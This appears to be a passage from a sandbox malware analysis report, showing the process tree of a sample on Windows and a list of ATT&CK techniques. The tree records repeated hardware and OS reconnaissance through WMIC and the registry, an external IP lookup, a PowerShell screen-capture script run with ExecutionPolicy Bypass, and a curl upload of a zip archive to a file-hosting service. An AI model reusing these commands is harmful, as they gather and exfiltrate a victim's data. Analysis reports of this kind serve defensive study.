  PID:2588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2980
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1048
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:5064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Eleolwuj.zip";"
  2⤵
  PID:224
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Eleolwuj.zip";
    3⤵
    PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2364
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4324
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3036
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4052
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2908
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2284
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:792
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:556
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:908
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2516
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4416
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4832
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2276
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3268
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3560
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4280
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1416
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2088
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3948
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1040
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5080
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3028
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2608
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3248
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2332
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2080
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4548
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:3120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4292
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2128
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4676
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3932
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1408
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4592
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:5020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3408
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1772
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:684
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3524
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:4828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

